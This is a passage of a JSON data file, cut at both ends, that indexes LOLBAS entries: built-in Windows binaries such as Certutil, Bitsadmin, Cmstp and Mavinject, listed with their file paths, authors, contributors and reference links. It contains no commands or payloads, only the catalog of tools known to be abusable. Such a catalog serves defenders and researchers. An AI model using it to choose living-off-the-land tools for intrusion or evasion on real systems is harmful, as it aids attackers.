@notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"count":1},{"id":"lolbas:applaunch-exe","name":"Applaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"author":"Nathan Sawyer","created":"2026-08-08T00:00:00.000Z","contributors":["Nathan Sawyer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"count":1},{"id":"lolbas:aspnet-compiler-exe","name":"Aspnet_Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["cpl @cpl3h"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"count":1},{"id":"lolbas:at-exe","name":"At.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"author":"Freddie Barr-Smith","created":"2019-09-20T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/At/"],"count":1},{"id":"lolbas:atbroker-exe","name":"Atbroker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"count":1},{"id":"lolbas:bash-exe","name":"Bash.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Asif Matadar @d1r4c","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"count":5},{"id":"lolbas:bitsadmin-exe","name":"Bitsadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rob Fuller @mubix","Chris Gates @carnal0wnage","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"count":4},{"id":"lolbas:certoc-exe","name":"CertOC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"author":"Ensar Samil","created":"2021-10-07T00:00:00.000Z","contributors":["Ensar Samil @sblmsrsn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"count":2},{"id":"lolbas:certreq-exe","name":"CertReq.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"author":"David Middlehurst","created":"2020-07-07T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"count":2},{"id":"lolbas:certutil-exe","name":"Certutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Moriarty @Moriarty_Meng","egre55 @egre55","Lior Adar","Adam @hexacorn","SomeTestLeper @SomeTestLeper"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"count":7},{"id":"lolbas:change-exe","name":"Change.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"count":1},{"id":"lolbas:cipher-exe","name":"Cipher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"author":"Adetutu Ogunsowo","created":"2024-11-22T00:00:00.000Z","contributors":["Ade Ogunsowo @i_am_tutu","Alexander Sennhauser @conitrade"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"count":2},{"id":"lolbas:cmd-exe","name":"Cmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"author":"Ye Yint Min Thu Htut","created":"2019-06-26T00:00:00.000Z","contributors":["r0lan @yeyint_mth","Mr.0range @mr_0rng"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"count":4},{"id":"lolbas:cmdkey-exe","name":"Cmdkey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"count":1},{"id":"lolbas:cmdl32-exe","name":"cmdl32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"count":1},{"id":"lolbas:cmstp-exe","name":"Cmstp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Nick Tyrer @NickTyrer","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"count":3},{"id":"lolbas:colorcpl-exe","name":"Colorcpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"author":"Arjan Onwezen","created":"2023-06-26T00:00:00.000Z","contributors":["eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"count":1},{"id":"lolbas:computerdefaults-exe","name":"ComputerDefaults.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"author":"Eron Clarke","created":"2024-09-24T00:00:00.000Z","contributors":["Eron Clarke"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"count":1},{"id":"lolbas:configsecuritypolicy-exe","name":"ConfigSecurityPolicy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"author":"Ialle Teixeira","created":"2020-09-04T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"count":2},{"id":"lolbas:conhost-exe","name":"Conhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\conhost.exe"],"author":"Wietze Beukema","created":"2022-04-05T00:00:00.000Z","contributors":["Adam @hexacorn","Wietze @wietze"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"count":2},{"id":"lolbas:control-exe","name":"Control.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Control/"],"count":2},{"id":"lolbas:csc-exe","name":"Csc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"count":2},{"id":"lolbas:cscript-exe","name":"Cscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"count":1},{"id":"lolbas:customshellhost-exe","name":"CustomShellHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"author":"Wietze Beukema","created":"2021-11-14T00:00:00.000Z","contributors":["John Carroll @YoSignals"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"count":1},{"id":"lolbas:datasvcutil-exe","name":"DataSvcUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"author":"Ialle Teixeira","created":"2020-12-01T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"count":1},{"id":"lolbas:desktopimgdownldr-exe","name":"Desktopimgdownldr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"author":"Gal Kristal","created":"2020-06-28T00:00:00.000Z","contributors":["Gal Kristal @gal_kristal"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"count":1},{"id":"lolbas:devicecredentialdeployment-exe","name":"DeviceCredentialDeployment.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"count":1},{"id":"lolbas:dfsvc-exe","name":"Dfsvc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"count":1},{"id":"lolbas:diantz-exe","name":"Diantz.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"author":"Tamir Yehuda","created":"2020-08-08T00:00:00.000Z","contributors":["Tamir Yehuda @tim8288","Hai Vaknin @vakninhai"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"count":3},{"id":"lolbas:diskshadow-exe","name":"Diskshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"count":2},{"id":"lolbas:dnscmd-exe","name":"Dnscmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Shay Ber","Dimitrios Slamaris @dim0x69","Nikhil SamratAshok @nikhil_mitt"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"count":1},{"id":"lolbas:esentutl-exe","name":"Esentutl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Mike Cary @grayfold3d"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"count":6},{"id":"lolbas:eudcedit-exe","name":"Eudcedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"author":"Matan Bahar","created":"2025-08-07T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"count":1},{"id":"lolbas:eventvwr-exe","name":"Eventvwr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"author":"Jacob Gajek","created":"2018-11-01T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3","Matt Graeber @mattifestation","Orange Tsai @orange_8361"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"count":2},{"id":"lolbas:expand-exe","name":"Expand.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rahmat Nurfauzi @infosecn1nja","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"count":3},{"id":"lolbas:explorer-exe","name":"Explorer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"author":"Jai Minton","created":"2020-06-24T00:00:00.000Z","contributors":["Jai Minton @CyberRaiju","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"count":2},{"id":"lolbas:extexport-exe","name":"Extexport.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"count":1},{"id":"lolbas:extrac32-exe","name":"Extrac32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Oddvar Moe @oddvarmoe","Hai Vaknin(Lux @VakninHai","Tamir Yehuda @tim8288"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"count":4},{"id":"lolbas:findstr-exe","name":"Findstr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"count":4},{"id":"lolbas:finger-exe","name":"Finger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"author":"Ruben Revuelta","created":"2021-08-30T00:00:00.000Z","contributors":["Ruben Revuelta (MAPFRE CERT) @rubn_RB","Jose A. Jimenez (MAPFRE CERT) @Ocelotty6669","Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"count":1},{"id":"lolbas:fltmc-exe","name":"fltMC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fltMC.exe"],"author":"John Lambert","created":"2021-09-18T00:00:00.000Z","contributors":["Carlos Perez @Carlos_Perez"],"references":["https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"count":1},{"id":"lolbas:forfiles-exe","name":"Forfiles.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Eric @vector_sec","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"count":2},{"id":"lolbas:fsutil-exe","name":"Fsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick","Jimmy @bohops","Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"count":3},{"id":"lolbas:ftp-exe","name":"Ftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"author":"Oddvar Moe","created":"2018-12-10T00:00:00.000Z","contributors":["Casey Smith @subtee","BennyHusted","Amit Serper @0xAmit"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"count":2},{"id":"lolbas:gpscript-exe","name":"Gpscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"count":2},{"id":"lolbas:hh-exe","name":"Hh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"count":3},{"id":"lolbas:imewdbld-exe","name":"IMEWDBLD.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"author":"Wade Hickey","created":"2020-03-05T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"count":1},{"id":"lolbas:ie4uinit-exe","name":"Ie4uinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"count":1},{"id":"lolbas:iediagcmd-exe","name":"iediagcmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"author":"manasmbellani","created":"2022-03-29T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"count":1},{"id":"lolbas:ieexec-exe","name":"Ieexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"count":2},{"id":"lolbas:ilasm-exe","name":"Ilasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"author":"Hai vaknin (lux)","created":"2020-03-17T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @VakninHai","Lior Adar"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"count":2},{"id":"lolbas:infdefaultinstall-exe","name":"Infdefaultinstall.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"count":1},{"id":"lolbas:installutil-exe","name":"Installutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"count":3},{"id":"lolbas:iscsicpl-exe","name":"iscsicpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"author":"Ekitji","created":"2025-08-17T00:00:00.000Z","contributors":["hacker.house","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"count":2},{"id":"lolbas:jsc-exe","name":"Jsc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"author":"Oddvar Moe","created":"2019-05-31T00:00:00.000Z","contributors":["Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"count":2},{"id":"lolbas:ldifde-exe","name":"Ldifde.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"author":"Grzegorz Tworek","created":"2022-08-31T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"count":1},{"id":"lolbas:makecab-exe","name":"Makecab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"count":4},{"id":"lolbas:mavinject-exe","name":"Mavinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"count":2},{"id":"lolbas:microsoft-workflow-compiler-exe","name":"Microsoft.Workflow.Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"author":"Conor Richard","created":"2018-10-22T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","John Bergbom @BergbomJohn","FortyNorth Security @FortyNorthSec","Bank Security @Bank_Security"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"count":3},{"id":"lolbas:mmc-exe","name":"Mmc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Jimmy @bohops","clem @clavoillotte","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"count":3},{"id":"lolbas:mofcomp-exe","name":"Mofcomp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"author":"Daniel Gott","created":"2022-07-19T00:00:00.000Z","contributors":["Daniel Gott @gott_cyber","The DFIR Report @TheDFIRReport","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"count":1},{"id":"lolbas:mpcmdrun-exe","name":"MpCmdRun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"author":"Oddvar Moe","created":"2020-03-20T00:00:00.000Z","contributors":["Askar @mohammadaskar2","Oddvar Moe @oddvarmoe","RichRumble","Cedric 